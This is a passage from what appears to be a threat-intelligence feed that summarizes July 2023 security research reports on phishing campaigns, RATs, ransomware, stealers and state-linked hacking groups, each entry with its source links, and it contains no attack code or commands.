- US-based enterprise software firm JumpCloud says a state-backed hacking group breached its systems almost one month ago as part of a highly targeted attack focused on a limited set of customers. The company discovered the incident on June 27, one week after the attackers breached its systems via a spear-phishing attack. On July 5, JumpCloud discovered “unusual activity in the commands framework for a small set of customers” while investigating the attack and analyzing logs for signs of malicious activity.
Source:
https://www.bleepingcomputer.com/news/security/jumpcloud-discloses-breach-by-state-backed-apt-hacking-group/
https://jumpcloud.com/support/july-2023-iocs
—
- Intel Source:
- Perception Point
- Intel Name:
- A_complex_phishing_operation_Manipulated_Caiman
- Date of Scan:
- 2023-07-22
- Impact:
- LOW
- Summary:
- Perception Point investigated for a complex phishing operation that cwas called “Manipulated Caiman”. The threat actor, Manipulated Caiman, based on one of the files analyzed, containing the words “Loader Manipulado” in the pdb path. Seems like attacker’s origin is likely Latin America. Manipulated Caiman employs spear phishing with malicious attachments to deliver malware, such as URSA, SMTP bruteforce client, malicious extension installer, net info checker, and spammer client.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- The_delivery_of_BlotchyQuasar_malware
- Date of Scan:
- 2023-07-22
- Impact:
- MEDIUM
- Summary:
- IBM Security X-Force discovered some phishing emails leading to packed executable files delivering malware called BlotchyQuasar, likely developed by a group X-Force tracks as Hive0129. BlotchyQuasar is hardcoded to collect credentials from multiple Latin American-based banking applications and websites used within public and private environments.
—
- Intel Source:
- eSentire
- Intel Name:
- The_Delivery_of_Sorillus_RAT
- Date of Scan:
- 2023-07-21
- Impact:
- LOW
- Summary:
- Esentire researchers have identified Sorillus RAT, and a phishing page delivering using HTML smuggled files and links using Google’s Firebase Hosting service.
Source:
https://www.esentire.com/blog/google-firebase-hosting-abused-to-deliver-sorillus-rat-phishing-page
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_High_Evasive_Blank_Grabber_Returns
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified an infostealer builder known as ‘Blank Grabber’. It is released in 2022, however, since then, it has been frequently updated with 85 contributions to the project in the last one month alone. The infostealer targets Windows operating systems and possesses a wide range of capabilities aimed at stealing sensitive information from unsuspecting users.
Source:
https://www.cyfirma.com/outofband/blank-grabber-returns-with-high-evasiveness/
—
- Intel Source:
- Fortinet
- Intel Name:
- Diving_Deep_into_Rancoz_Ransomware
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed that a few months back the Rancoz ransomware first came to the public’s attention. However, it’s important to raise awareness of this ransomware variant, as the most recent victim on their data leak site on TOR dates back just a few weeks to mid-June.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-rancoz
—
- Intel Source:
- Citizenlab
- Intel Name:
- The_Analysis_of_HKLEAKS_Campaign
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- Researchers from Citizen Lab have conducted a forensic analysis of the entire identifiable digital footprint of the HKLEAKS campaign. In August 2019, at the height of the Anti-Extradition Bill protests that rocked Hong Kong, a series of websites branded “HKLEAKS” began surfacing on the web. Claiming to be run by anonymous citizens, they systematically exposed (“dotted”) the personal identifiable information of protesters, journalists, and other individuals perceived as affiliated with the protest movement.
—
- Intel Source:
- Vadesecure
- Intel Name:
- M365_Phishing_Email_Analysis
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- Vade’s researchers have detected a new Microsoft 365 phishing attack and analyzed an email containing a malicious HTML attachment.
Source:
https://www.vadesecure.com/en/blog/m365-phishing-email-analysis-eevilcorp
—
- Intel Source:
- CERT-HR
- Intel Name:
- WordPress_Plugin_ULTIMATE_MEMBER_Is_Vulnerable
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- CERT-HR researchers have observed that ‘Ultimate Member’ is a plugin that allows registration and management of communities on WordPress sites. The critical vulnerability (CVE-2023-3460) has been rated 9.8. All versions of the plugin, which has more than 200,000 active installations, are vulnerable.
—
- Intel Source:
- Trustwave
- Intel Name:
- Enterprise_Applications_Honeypot_revealed_some_findings
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Trustwave researchers have established a honeypot sensors network across six countries: Russia, Ukraine, Poland, UK, China, and the United States. Also, they present the most intriguing findings from the research into exposing vulnerable enterprise applications, such as Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian BitBucket, and F5 Big-IP.s
—
- Intel Source:
- Uptycs
- Intel Name:
- Fake_PoC_for_Linux_Kernel_Vulnerability_on_GitHub
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Cybersecurity researchers continue to be under the radar of malicious actors, a proof-of-concept (PoC) has been discovered on GitHub, concealing a backdoor with a “crafty” persistence method.
Source:
https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_activities_of_the_UAC_0010_group_as_of_July_2023
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- The continuous accumulation and analysis of data on cyber incidents allows us to conclude that one of the most persistent cyber threats is UAC-0010 (Armageddon), the activities of which are carried out by former “officers” of the State Security Service of Crimea, who in 2014 betrayed their military oath and began to serve the FSB of Russia. The main task of the group is cyberespionage against the security and defense forces of Ukraine. At the same time, we know at least one case of destructive activity at an information infrastructure facility.
—
- Intel Source:
- KrebsonSecurity
- Intel Name:
- DomainNetworks_Mail_Scam
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Researchers from KrebsonSecurity have identified domainNetworks is a fraudulent company behind a snail mail scam targeting domain owners. Its true operators remain unidentified, despite connections to thedomainsvault.com and UBSagency. These scams trick organizations into paying for unnecessary services.
—
- Intel Source:
- Kaspersky, Palant
- Intel Name:
- Malicious_extensions_in_Chrome_Web_Store
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- The subpage of the Kaspersky official blog discusses the discovery of malicious extensions in the Chrome Web Store with a total of 87 million downloads. The most popular extension, “Autoskip for Youtube,” had nine million downloads. Users are advised to check and uninstall any malicious extensions as they can access user data.
Source:
https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/
https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/
—
- Intel Source:
- Lab52
- Intel Name:
- New_Invitation_From_APT29_to_Use_CCleaner
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Researchers from Lab52 have seen a phishing effort that appears to be the Norwegian embassy inviting people to a party. The format of this particular “invitation” is in .svg. When the file is opened, a script is run that mounts and downloads an ISO file that contains the subsequent infection stage. The .svg file serves as an HTML smuggler in this manner, infecting the target and causing them to skip the subsequent stage.
Source:
https://lab52.io/blog/2344-2/
—
- Intel Source:
- Rapid7
- Intel Name:
- Old_Blackmoon_Trojan_NEW_Monetization_Approach
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
-
Rapid7 has discovered a new campaign using the Blackmoon trojan targeting businesses in the USA and Canada.
This campaign focuses on implementing evasion and persistence techniques, such as disabling Windows Defender.
The trojan uses various persistence techniques, process injection, and exploits for remote services.
It disables security tools, hijacks resources, and communicates with a Command and Control server using web protocols.
The webpage includes file names, MD5 hashes, email addresses, a reference to a C&C server, and a link to a related article on monitor persistence.
Source:
https://www.rapid7.com/blog/post/2023/07/13/old-blackmoon-trojan-new-monetization-approach/
—
- Intel Source:
- Sysdig
- Intel Name:
- SCARLETEEL_2
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Sysdig observed the their most recent activities of new version of SCARLTEEL 2.0. The analysts saw a similar strategy to previously reported of compromise AWS accounts through exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped. By knowing the details of SCARLETEEL previously, it was discovered they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.
—
- Intel Source:
- Sucuri
- Intel Name:
- A_variant_of_a_common_malware_injection
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- A recent investigation found malware injecting obfuscated JavaScript into legitimate files, redirecting website traffic to a parked domain for ad monetization. The injected script creates an invisible iframe from the parked domain, generating ad revenue and potentially redirecting visitors to questionable sites.
Source:
https://blog.sucuri.net/2023/07/malicious-injection-redirects-traffic-to-parked-domain.html
—
- Intel Source:
- Symantec, Cyble
- Intel Name:
- Microsoft_ZeroDay_Vulnerability_Exploited_by_Attackers
- Date of Scan:
- 2023-07-18
- Impact:
- HIGH
- Summary:
-
Attackers are making use of a zero-day vulnerability (CVE-2023-36884) that affects Microsoft Windows and Office products. The exploit has so far been applied in extremely targeted attacks against businesses in the European and North American government and defense industries.
Link: https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-zeroday-exploit
—
- Intel Source:
- FACCT
- Intel Name:
- RedCurl_Hackers_Return_to_Spy_on_Major_Russian_Banks
- Date of Scan:
- 2023-07-18
- Impact:
- MEDIUM
- Summary:
- According to FACCT, the Russian-speaking Red Curl organization has attacked businesses in the UK, Germany, Canada, Norway, Ukraine, and Australia at least 34 times. Twenty of the attacks—more than half—took place in Russia. Construction, financial, consultancy, retail, banking, insurance, and legal enterprises were among the victims of cyber espionage.
Source:
https://www.facct.ru/blog/redcurl-2023/?utm_source=twitter&utm_campaign=redcurl-23&utm_medium=social
—
- Intel Source:
- Wordfence
- Intel Name:
- Massive_Targeted_Exploit_Campaign_Against_WooCommerce_Payments
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Wordfence researchers have identified there is an ongoing exploit campaign targeting a vulnerability in the WooCommerce Payments plugin. Attackers can gain administrative privileges on vulnerable websites. Wordfence provides protection against this vulnerability
—
- Intel Source:
- Talos
- Intel Name:
- Malicious_Campaigns_Targeting_Civilian_Military_and_Governmental_Organisations
- Date of Scan:
- 2023-07-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Talos have identified a threat actor who has been running various campaigns in Poland and Ukraine against civilian users, military groups, and governmental institutions. They determined that these actions are most likely carried out with the intent to steal data and gain ongoing remote access.
Source:
https://blog.talosintelligence.com/malicious-campaigns-target-entities-in-ukraine-poland/
—
- Intel Source:
- Fortinet
- Intel Name:
- Microsoft_Office_Vulnerabilities_and_Macros_Used_by_LokiBot_Campaign
- Date of Scan:
- 2023-07-17
- Impact:
- MEDIUM
- Summary:
- Several malicious Microsoft Office documents created to take advantage of known vulnerabilities have been found by FortiGate researchers. Remote code execution flaws include CVE-2021-40444 and CVE-2022-30190 specifically. By taking advantage of these flaws, the attackers were able to insert malicious macros into Microsoft documents that, when used, installed the LokiBot malware on the victim’s computer
—
- Intel Source:
- Sentinelone
- Intel Name:
- Credential_Stealer_Expands_to_Azure_GCP_from_AWS
- Date of Scan:
- 2023-07-17
- Impact:
- LOW
- Summary:
- This ad shows the development of an experienced cloud actor who is knowledgeable about a variety of technologies. The actor apparently underwent a great deal of trial and error, as evidenced by decisions like feeding the curl binary to systems that do not already have it. Additionally, the actor has enhanced the tool’s data layout to promote more autonomous engagement, displaying a certain amount of maturity and proficiency.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Beware_of_Cloaked_Ursa_Phishing_Scam
- Date of Scan:
- 2023-07-17
- Impact:
- LOW
- Summary:
- Unit 42 researchers have observed instances of Cloaked Ursa using lures focusing on the diplomats themselves more than the countries they represent. Also, identified Cloaked Ursa targeting diplomatic missions within Ukraine by leveraging something that all recently placed diplomats need – a vehicle.
Source:
https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
—
- Intel Source:
- Lumen
- Intel Name:
- Exploring_AVrecon_Underground_Routers
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- Another multi-year scheme involving infected routers all around the world is discovered by Lumen Black Lotus Labs. Small-office/home-office (SOHO) routers are infected as part of a sophisticated operation that uses the Linux-based Remote Access Trojan (RAT) known as “AVrecon.”
Source:
https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/
—
- Intel Source:
- Aquasec
- Intel Name:
- Introducing_TeamTNT_New_Cloud_Campaign
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- AquaSec researchers have uncovered an emerging campaign that is targeting exposed Docker APIs and JupyterLab instances. Upon further investigation of the infrastructure, found evidence of a broader campaign orchestrated by TeamTNT.
Source:
https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign
—
- Intel Source:
- AT&T
- Intel Name:
- Attackers_Leveraging_OneNote_to_Deliver_Malware
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- Malware distributed using phishing emails with a OneNote attachment has increased from December 22nd, 2022. The end user would open the OneNote attachment, as they do with most phishing emails, but OneNote does not support macros like Microsoft Word or Excel do. Threat actors have historically used this method to launch programs that install malware.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Modify_TeamViewer_Installer_to_Deliver_njRAT
- Date of Scan:
- 2023-07-15
- Impact:
- LOW
- Summary:
- Researchers from Cyble have discovered a noteworthy occurrence involving the false use of a TeamViewer program file. A popular software program called TeamViewer enables remote control, desktop sharing, online meetings, file transfers, and group collaboration across numerous devices.
Source:
https://blog.cyble.com/2023/07/13/trojanized-application-preying-on-teamviewer-users/
—
- Intel Source:
- ThreatFabric
- Intel Name:
- A_New_Sophisticated_Toolkit_For_Vishing_Called_Letscall
- Date of Scan:
- 2023-07-15
- Impact:
- LOW
- Summary:
- Researchers from Threat Fabric have identified a new sophisticated Vishing toolset called Letscall which currently targeting individuals from South Korea.
Source:
https://www.threatfabric.com/blogs/letscall-new-sophisticated-vishing-toolset
—
- Intel Source:
- Mandiant
- Intel Name:
- Stealing_Secrets_With_Infected_USB_Drives
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- Mandiant researchers have observed a threefold increase in the number of attacks using infected USB drives to steal secrets. The campaign named ‘Sogu,’ attributed to a Chinese espionage threat group ‘TEMP.HEX,’ and another named ‘Snowydrive,’ attributed to UNC4698, which targets oil and gas firms in Asia.
Source:
https://www.mandiant.com/resources/blog/infected-usb-steal-secrets
—
- Intel Source:
- CERT-UA
- Intel Name:
- SmokeLoader_Distribution_via_Email
- Date of Scan:
- 2023-07-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a mass mailing of electronic messages with the subject “Invoice” and an attachment in the form of the file “Act_Zvirky_ta_rah.fakt_vid_12_07_2023.zip” containing the VBS file “invoice_from_12_07_2023_to_payment .vbs “, the opening of which will ensure that the SmokeLoader malware is downloaded and launched.
—
- Intel Source:
- TrendMicro
- Intel Name:
- BPFDoor_Backdoor_Variants_Abusing_BPF_Filters
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- BPFDoor has since become more difficult to detect due to the improved usage of Berkeley Packet Filter (BPF), a technology that allows programs to attach network filters to an open socket that’s being used by the threat actors behind BPFDoor to bypass firewalls’ inbound traffic rules and similar network protection solutions in Linux and Solaris operating systems (OS).
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malicious_Extension
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- The specific information on this subpage includes a password-protected RAR archive with the passwords 888 or 999. An MSI file has been analyzed, and it is mentioned that Malwarebytes EDR and MDR can remove ransomware remnants and prevent reinfection. There is also a free trial available for Malwarebytes’ cybersecurity services
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Threat_Group_Using_Chrome_Remote_Desktop
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- Remote Desktop by the Kimsuky threat group, supported by North Korea, for their attacks. The group utilizes their own AppleSeed malware, as well as other remote control tools like Meterpreter and VNC, to gain control over infected systems. The Kimsuky group mainly distributes malware through spear phishing emails containing HWP and MS Office document files or CHM files. They also use Infostealer to gather sensitive information.
—
- Intel Source:
- Huntress
- Intel Name:
- Business_Email_Compromise_hunting_details
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- The subpage specifically discusses threat hunting for business email compromise (BEC) using user agents on Microsoft 365. The author shares their approach and examples of suspicious user agents.vThey emphasize the importance of baseline user behavior, detection technology, The subpage also includes information on terms of use, privacy policy, legalities, and cookie policy of Huntress, with an option to sign up for blog updates.and prevention measures like multi-factor authentication.
Source:
https://www.huntress.com/blog/threat-hunting-for-business-email-compromise-through-user-agents
—
- Intel Source:
- Wiz
- Intel Name:
- The_cloud_workloads_targeted_by_Python_based_fileless_malware
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- This subpage discusses the PyLoose fileless malware that targets cloud workloads. It provides information on the attack flow, including initial access, Python script drop, fileless execution, and in-memory XMRig execution. It mentions the attacker’s Monero wallet address and provides details about the PyLoose loader’s associated files and hash values. The subpage also references other articles and promotes the Wiz platform for cloud security.
Source:
https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads
—
- Intel Source:
- Talos
- Intel Name:
- RedDriver_targets_Chinese_speakers_and_internet_cafes
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- The specific information on this subpage describes an undocumented browser hijacker called RedDriver. It explains that RedDriver targets Chinese speakers and internet cafes, and uses the Windows Filtering Platform to intercept browser traffic. It bypasses driver signature enforcement policies and utilizes stolen certificates. The authors of RedDriver are skilled in driver development and have deep knowledge of the Windows operating system. The subpage also includes a list of domains associated with RedDriver and provides various software and support resources offered by Talos.
Source:
https://blog.talosintelligence.com/undocumented-reddriver/
—
- Intel Source:
- Blackberry
- Intel Name:
- The_suspicion_of_targeting_Ukraine_s_NATO_Membership_Talks_by_RomCom_Threat_Actor
- Date of Scan:
- 2023-07-12
- Impact:
- MEDIUM
- Summary:
- In the bebinning of this month, the BlackBerry Threat researchers found two malicious documents came from an IP address in Hungary, sent as bate to an organization supporting Ukraine abroad, and a document targeting upcoming NATO Summit guests. Blackberry analysis assume to conclude that the threat actor known as RomCom who is behind this operation. Based on our internal network data analysis, and the full set of cyber tools were collected, was believed the threat actor behind this campaign ran their first drills on June 22, and also a few days before the command-and-control (C2) mentioned in their report was registered and went live.
Source:
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
—
- Intel Source:
- Uptycs
- Intel Name:
- Deceptive_PoC_poses_hidden_backdoor
- Date of Scan:
- 2023-07-12
- Impact:
- LOW
- Summary:
- Uptycs reserachers discovered Backdoor disguised as innocuous learning tool targets Linux systems. Ensure removal of unauthorized SSH keys, delete kworker file, remove kworker path from bashrc file, and check /tmp/.iCE-unix.pid for potential threats. Exercise caution when testing PoCs and utilize isolated environments for protection.
Source:
https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
—
- Intel Source:
- Microsoft
- Intel Name:
- StormP_0978_phishing_campaign_uncovered_by_Microsoft
- Date of Scan:
- 2023-07-12
- Impact:
- LOW
- Summary:
- Microsoft identifies Storm-0978 targeting defense and government entities in Europe and North America. Exploiting CVE-2023-36884, they employ phishing campaigns and distribute the RomCom backdoor. Storm-0978 conducts opportunistic ransomware and espionage-related operations
—
- Intel Source:
- TrendMicro
- Intel Name:
- Rootkit_acts_as_a_universal_loader
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- TrendMicro researchers observed New signed rootkit discovered originating from China targets the gaming sector. The rootkit acts as a universal loader and communicates with a command-and-control infrastructure. It has passed through the Windows Hardware Quality Labs process and obtained a valid signature. Reported to Microsoft’s Security Response Center.
—
- Intel Source:
- Zscalar
- Intel Name:
- Analysis_of_New_MultiStage_Attack_Targeting_LATAM_Region
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- Zscaler researchers have uncovered a concerning development, a new targeted attack campaign striking businesses in the Latin American (LATAM) region. This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage.
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_malicious_batch_file
- Date of Scan:
- 2023-07-11
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware in the form of a batch file (*.bat). This malware is designed to download various scripts based on the anti-malware process, including AhnLab products, installed in the user’s environment. Based on the function names used by the malware and the downloaded URL parameters, it is suspected to have been distributed by the Kimsuky group
—
- Intel Source:
- ASEC
- Intel Name:
- Rekoobe_Backdoor_targeting_Linux_systems_in_Korea
- Date of Scan:
- 2023-07-11
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has been receiving reports of the Rekoobe malware from tenants in Korea for several years, and will hereby share its brief analysis. Additionally, the Rekoobe variants will be categorized along with a summary of the ones used to target Korean companies.
—
- Intel Source:
- Lab52
- Intel Name:
- Unknown_Actor_Targeting_Chinese_Users_With_APT29_TTP
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Lab52 researchers have identified a different maldoc samples of a potential malicious campaign. The maldoc seems to be a campaign against Chinese speaking users as the content of the maldoc is written in Chinese. The infection chain is similar to the threat actor APT29, however it has been identified significant differences related to the typical APT29’s infection chain that makes consider that it does not seem to be this threat actor.
Source:
https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_BlackByte_ransomware_deep_analyses
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Microsoft Incident Response team observed threat actor went through the full attack chain, from initial access to impact in less than five days, causing a huge impact on the business disruption for the victim organization. Their findings dicovered that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_malvertising_USPS_campaign
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Malwarebytes researechers observed a recent phishing attack that was targeting both mobile and Desktop users looking up to track their packages via the United States Postal Service website.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Ukrainian_Public_Entities_Are_Targeted_by_UAC_0057
- Date of Scan:
- 2023-07-10
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a new targeted cyber attack by the UAC-0057 group against Ukrainian public officials leveraging XLS files that contain a malicious macro spreading PicassoLoader malware. The malicious loader is capable of dropping another malicious strain dubbed njRAT to spread the infection further.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Phishing_Attacks_by_APT28_Group
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- CERT-UA researchers have discovered HTML files that imitate the web interface of mail services and implement the technical possibility of exfiltrating authentication data entered by the victim using HTTP POST requests. At the same time, the transfer of stolen data is carried out using previously compromised Ubiquiti devices (EdgeOS)
—
- Intel Source:
- TrendMicro
- Intel Name:
- Deep_details_of_Big_Head_Ransomware_s_Variants
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- Deeper analyses and updates IOCs
—
- Intel Source:
- ASEC, Ciberdefensa
- Intel Name:
- The_distribution_of_NetSupport_RAT
- Date of Scan:
- 2023-07-10
- Impact:
- LOW
- Summary:
- ASEC lab reserachers discovered NetSupport RAT being distributed via a spear phishing email that has recently been in circulation. Their analyses showed the whole provess flow from its distribution via phishing emails and its detection.
Source:
https://ciberdefensa.cat/archivos/16021
https://asec.ahnlab.com/en/55146/
—
- Intel Source:
- CISA
- Intel Name:
- Increasing_TrueBot_Malware_Attacks
- Date of Scan:
- 2023-07-09
- Impact:
- MEDIUM
- Summary:
- CISA researchers have warned about the emergence of new variants of the TrueBot malware. These variants specifically target organizations in the United States and Canada, aiming to extract sensitive data from compromised networks.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Analysis_of_TA453s_Foray_into_LNKs_and_Mac_Malware
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- Proofpoint researchers have observed that TA453 continues to adapt its malware arsenal, deploying novel file types and targeting new operating systems, specifically sending Mac malware to one of its recent targets.
—
- Intel Source:
- Cyble
- Intel Name:
- Ransomware_Lists_Victim_Host_Information_in_Ransom_Note
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a new ransomware strain named “Underground team ransomware,” The ransom note of the Underground Team ransomware introduces novel elements that distinguish it from typical ransom notes. In addition to guaranteeing a fair and confidential deal within a short timeframe, the group offers more than just a decryptor.
Source:
https://blog.cyble.com/2023/07/05/underground-team-ransomware-demands-nearly-3-million/
—
- Intel Source:
- Cyble
- Intel Name:
- ARCrypter_ransomware_activity
- Date of Scan:
- 2023-07-08
- Impact:
- LOW
- Summary:
- ARCrypter ransomware, also known as ChileLocker, got attention since last August 2022 with their attack in Chile. Soon, researchers discovered that this ransomware started targeting organizations worldwide. It has been observed that ARCrypter ransomware targets both Windows and Linux operating systems.This year, researchers reported the existanse of a new Linux variant of ARCrypter, developed using the GO programming language and also an updated version of the ARCrypt Windows executable. The TA discovered the new techniques of TA to interact with their victims. In comparasing with the older variant of ARCrypt ransomware, the researcgers identified the following: The ransom note of each binary was pointing to a mirror site and the TA created dedicated chat sites hosted on Tor for each victim.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Malicious_NPM_Packages_Fuel_Supply_Chain_and_Phishing_Attacks
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- ReversingLabs researchers have discovered more than a dozen malicious packages published to the npm open-source repository that appear to target application end users while also supporting email phishing campaigns targeting Microsoft 365 users.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Hackers_From_China_Targeting_Europe_in_SmugX_Campaign
- Date of Scan:
- 2023-07-07
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have identified a campaign where a Chinese threat actor targeting government entities in Europe, with a focus on foreign and domestic policy entities.
Source:
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
—
- Intel Source:
- Reliaquest
- Intel Name:
- The_Details_of_Infection_of_Gootloader_Led_to_Credential_Access
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- The ReliaQuest researchers have responded to an incident involving credential access and exfiltration that was traced back to the JavaScript-based initial access malware “Gootloader.”
Source:
https://www.reliaquest.com/blog/gootloader-infection-credential-access/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Diving_Deep_into_Emotet_Malware_Family
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- Emotet is a malware family active since 2014, operated by a cybercrime group known as Mealybug or TA542. It is launched multiple spam campaigns since it re-appeared after its takedown. Also, Mealybug created multiple new modules and multiple times updated and improved all existing modules.
Source:
https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/
—
- Intel Source:
- Aquasec
- Intel Name:
- Analysis_of_Silentbobs_Cloud_Attack
- Date of Scan:
- 2023-07-07
- Impact:
- MEDIUM
- Summary:
- Aqua Nautilus researchers have identified an infrastructure of a potentially massive campaign against cloud-native environments. It is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware, cloud credentials hijack, resource hijack and further infestation of the worm.
Source:
https://blog.aquasec.com/threat-alert-anatomy-of-silentbobs-cloud-attack
—
- Intel Source:
- Sekoia
- Intel Name:
- NoName_057_16_DDoSia_Project_Gets_an_Upgrade
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Researchers from Sekoia have analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia collective NoName(057)16.
Source:
https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/
—
- Intel Source:
- Cyble
- Intel Name:
- Multiple_New_Clipper_Malware_Variants
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Cyble researchers discovered several Clipper malware variants, including Laplas Clipper, IBAN Clipper, Keona Clipper, and many others in the past. Recently, they observed several variants of Clipper malware and saw a significant number of samples related to these variants being submitted to VirusTotal. The Clipper malware operates by cunningly hijacking cryptocurrency transactions, stealthily replacing the victim’s wallet address with that of the Threat Actors’ (TAs) wallet address. Suppose an unsuspecting user tries to pay from their cryptocurrency account, and the transaction has been diverted to an entirely different recipient (the account of the TAs instead of the intended recipient). This alarming turn of events can lead to significant financial losses and potential devastation for the victim.
Source:
https://blog.cyble.com/2023/06/30/multiple-new-clipper-malware-variants-discovered-in-the-wild/
—
- Intel Source:
- Quickheal
- Intel Name:
- White_Snake_stealer_threat
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Quick heal researchers provided the technical aspects of the updated White snake stealer version 1.6, to provide insights into its behaviour and shed light on its latest capabilities.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Attackers_Targeting_North_Atlantic_Treaty_Organization
- Date of Scan:
- 2023-07-06
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered the website, which copies the English version of the web resource of the international non-governmental organization “World Congress of Ukrainians” legitimate page.
—
- Intel Source:
- Elastic
- Intel Name:
- New_Variant_of_North_Korea_linked_RUSTBUCKET_macOS_Malware
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. It allows operators to download and execute various payloads.
Source:
https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
—
- Intel Source:
- Sentinelone
- Intel Name:
- Neo_Nets_eCrime_campaign_targeted_financial_institutions
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- SentinelLabs has been tracking Neo_Net conducted an eCrime campaign targeting clients of financial institutions, primarily in Spain and Chile. Using SMS phishing messages and fake banking pages, Neo_Net stole over 350,000 EUR and compromised personal information of thousands of victims. The campaign involved renting out infrastructure, selling victim data, and offering a Smishing-as-a-Service platform.
Source:
